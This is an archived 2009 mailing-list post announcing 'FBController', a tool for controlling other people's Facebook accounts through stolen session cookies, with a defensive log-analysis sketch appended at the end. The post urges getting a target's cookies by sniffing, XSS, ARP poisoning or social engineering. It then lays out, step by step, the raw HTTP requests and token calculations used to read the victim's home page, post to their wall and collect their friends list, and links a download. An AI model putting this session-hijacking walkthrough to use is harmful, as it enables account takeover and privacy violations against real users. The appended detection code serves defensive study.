[WEB SECURITY] FBController - (Facebook Control Utility) version 1.0

QUAKER DOOMER quakerdoomer at inbox.lv
Thu Apr 30 16:31:53 EDT 2009


FBController - The Ultimate Utility to Control Facebook accounts without the 
Password.

Let me make it clear that this utility WON'T hack/crack Facebook accounts.
The utility will need biscuits/cookies instead of the password.

Get the target's cookie by sniffing, XSS, social engineering, ARP Poison-Sniffing, 
scroogle search, anyhow !
Once you have the cookies you can use FBController and have Full control over the 
target's Facebook account.

==============================================================
Login to your Facebook account and sniff your cookie OR collect a few live Facebook 
Biscuit/s of your Target/s.

1 ] Generate an OG 10 Digit Unix Timestamp. If possible, not much older than 
FaceBook.COM's current SYSTIME.


2 ] Send a GET Request to www.facebook.com port 80 after calculating the required 
variables (below)
[code]
GET /home.php? HTTP/1.1
Cookie: datr=(10-DIGIT-CURRENT-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; 
test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; 
cvr_tx=(OG-TIME-STAMP+63-TOTAL-SHOULD-BE-10-DIGIT-NEWTIMESTAMP)859; 
login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); 
c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
FOREVER-FIXED-FOR-YOUR-ID); locale=en_US
[/code]


3 ] From the Response Obtained :
Obtain the variable nctr[nid]. For now keep nctr[id] same as nctr[nid].

Calculating the new nctr[ct] :
Add +79 to Original Timestamp. Append 3 more digits to its end.

Calculating &oldest= :
Deduct 144556 from Original Timestamp.

Calculating composer_id :
Search for
UIComposer_STATE_PIC_OUTSIDE\" id=\"
This will be your composer_id at the later stage in the Status Update Page / Other 
Post Request

Calculating post_form_id
Search for
post_form_id:"
This will be your post_form_id at the later stage in the Status Update Page / Other 
Post Request

Calculating fb_dtsg
Right after post_form_id (explained just above this section) you can locate fb_dtsg.
Else Search for
,fb_dtsg:"
This will be your fb_dtsg at the later stage in the Status Update Page / Other Post 
Request

Your login_x actually looks like
a:2:{s:5:"email";s:13:"you at youremailprovider.com";s:19:"remember_me_default";b:0;}
But keep it unchanged in the hex format.


4 ] Send a GET Request like below with the above calculated variables :
[code]
GET /ajax/intent.php?hidden_count=5&oldest=(10-DIGIT-NEWLY-
CALCULATED)&delay_load_count=15&request_type=none&nctr[id]=(32-HEX-
STRING-OBTAINED-FROM-home.php-)&nctr[nid]=(32-HEX-STRING-OBTAINED-
FROM-home.php-)&nctr[ct]=(NEWLY-CALCULATED-10-DIGIT-TIMESTAMP)750 
HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Connection: Keep-Alive
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; 
test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; 
login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); 
c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); made_write_conn=(OG-TIME-
STAMP+64-10-DIGIT-NEW-STAMP); cur_max_lag=3; h_user=(12-HEX-STRING-
FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A%2F
%2Fwww.facebook.com%2Fhome.php
[/code]

5 ] In the output :
Search for  Env[\"nctrlid\"]=\"
This is the NEW TRUE nctr[id]= for the Status Update POST Request :-)


6 ] Generate a new POST Request with the above calculated new variables :
[code]
POST /updatestatus.php HTTP/1.1
Accept: */*
Accept-Language: en-US
XXXXXXX: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX
x-svn-rev: 161013
Content-Type: application/x-www-form-urlencoded
UA-CPU: x86
XXXXXXXXXXXXXXX: XXXXXXXXXXXXX
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.facebook.com
Content-Length: 343
Connection: Keep-Alive
Cache-Control: no-cache
Cookie: datr=(10-DIGIT-CURRENt-UNIX-TIMESTAMP)-(53-HEX-STRING-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); ABT=(36-HEX-STRING-
PROVIDED-BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES)%3AA; 
test_cookie=1; login=+; s_cc=true; s_vsn_facebookpoc_1=(13-DIGITS-PROVIDED-
BY-FACEBOOK-CHANGES-AFTER-A-FEW-MINUTES); s_sq=%5B%5BB%5D%5D; 
login_x=a%3A2%3A%7Bs%3A5%3A%22email%22%3Bs%3A13%3A%22youremailid
%40yourprovider.com%22%3Bs%3A19%3A%22remember_me_default%22%3Bb
%3A0%3B%7D; xs=(32-HEX-STRING-CHANGES-AFTER-A-FEW-MINUTES); 
c_user=(10-DIGIt-FOREVER-FIXED-FACEBOOKID); cur_max_lag=3; h_user=(12-
HEX-STRING-FOREVER-FIXED-FOR-YOUR-ID); locale=en_US; x-referer=http%3A
%2F%2Fwww.facebook.com%2Fhome.php

action=HOME_UPDATE&home_tab_id=1&profile_id=(YOUR-10-DIGIT-PROFILE-
ID)&status=TYPE-THE-STATUS-HERE&target_id=0&&composer_id=(24-HEX-
STRING-OBTAINED-FROM-home.php-RESPONSE))&post_form_id=(32-HEX-STRING-
FROM-home.php-RESPONSE)&fb_dtsg=(27-HEX-STRING-)-FROM-home.php-
RESPONSE&post_form_id_source=AsyncRequest&nctr[id]=(32-HEX-STRING-
CALCULATED-AS-EXPLAINED-IN-POINT-5)&nctr[nid]=(32-HEX-STRING-OBTAINED-
FROM-home.php-RESPONSE)&nctr[ct]=(10-DIGIT-CALCULATED-TIMESTAMP-AS-
EXPLAINED-In-POINT-3)375
[/code]


7 ] Use the above variables to view any content with the appropriate GET / requests


8 ] For POST-ing / making changes, GOTO 2 ] and REDO :-)


Looks like loads of HardWork ha ?
If you don't want to do all this manually, then you can download this TooL named 
FBController (FACEBOOK CONTROLLER)  written
by me. 
Till now FBController version 1.0 uses your Target's provided cookie and only :

A > Downloads the HomePage.
B > Allows you to Update the Target's Wall and
C > Retrieve your Target's Friend's List

There are many APIs available to write apps and 3rd party Tools for FB in Java, 
Perl, .NET, etc.

FBConTroller was entirely written without knowing any of Facebook's Dev APIs.
Considering the above along with Facebook's complexity, the next version might take 
some time to get released.

Many more features to come in version 2.0

A 26th April Release !
Research duration some 33 hours - Sunday Evening 26th April 2009 -to- 29th April 
2009.

Happy Controlling ! :-)
==============================================================

Download : http://my.opera.com/quakerdoomer/blog/2009/04/30/fbcontroller-facebook-
controller-the-ultimate-facebook-controller-without-the-pa

The Latest available release is FBCONTROLLER version 1.0
Coded by : Azim Poonawala (QUAKERDOOMER)
Author's website : http://solidmecca.co.nr

Regards,
QUAKERDOOMER
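
From the defender's side, the cookie replay described in this post appears in server logs as one session cookie pair (c_user, xs) arriving from a second client. The sketch below is an added example, not part of the original post or of the FBController tool; the log records, IP addresses and cookie values are constructed, and the Request record layout and the find_replayed_sessions name are assumptions.

```python
from collections import namedtuple

# Assumed log record layout (hypothetical): one entry per authenticated HTTP request.
Request = namedtuple("Request", "ts ip user_agent cookie_header path")

def parse_cookies(header):
    """Split a Cookie request header into a {name: value} dict."""
    jar = {}
    for part in header.split(";"):
        name, sep, value = part.strip().partition("=")
        if sep:
            jar[name] = value
    return jar

def find_replayed_sessions(requests, session_cookies=("c_user", "xs")):
    """Alert when a session cookie pair is used by a client other than its first user."""
    first_seen = {}  # session key -> (ip, user_agent) that first presented it
    alerts = []
    for req in sorted(requests, key=lambda r: r.ts):
        jar = parse_cookies(req.cookie_header)
        if not all(name in jar for name in session_cookies):
            continue  # no session cookies: not an authenticated request
        key = tuple(jar[name] for name in session_cookies)
        origin = first_seen.setdefault(key, (req.ip, req.user_agent))
        changed = [field for field, old, new in
                   (("ip", origin[0], req.ip), ("user_agent", origin[1], req.user_agent))
                   if old != new]
        if changed:
            # An IP change alone can be benign (mobile networks, NAT); a changed
            # User-Agent inside one session is a much stronger replay signal.
            alerts.append({"session": key, "changed": changed,
                           "ts": req.ts, "path": req.path})
    return alerts

# Constructed sample log: cookie values, IPs (documentation ranges) and times are made up.
VICTIM_UA = "Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.9) Firefox/3.0.9"
TOOL_UA = "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)"  # UA from the post's requests
SAMPLE_LOG = [
    Request(1241120000, "198.51.100.7", VICTIM_UA, "c_user=1000000001; xs=aa11; locale=en_US", "/home.php"),
    Request(1241120300, "198.51.100.7", VICTIM_UA, "c_user=1000000001; xs=aa11; locale=en_US", "/ajax/intent.php"),
    Request(1241120900, "203.0.113.50", TOOL_UA, "c_user=1000000001; xs=aa11; locale=en_US", "/updatestatus.php"),
    Request(1241121000, "192.0.2.33", TOOL_UA, "c_user=1000000002; xs=bb22; locale=en_US", "/home.php"),
]

if __name__ == "__main__":
    for alert in find_replayed_sessions(SAMPLE_LOG):
        print(alert)
```

Detection complements prevention: serving the site only over HTTPS with the Secure and HttpOnly attributes on the session cookies closes the sniffing and script-read routes the post lists for obtaining the cookie.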

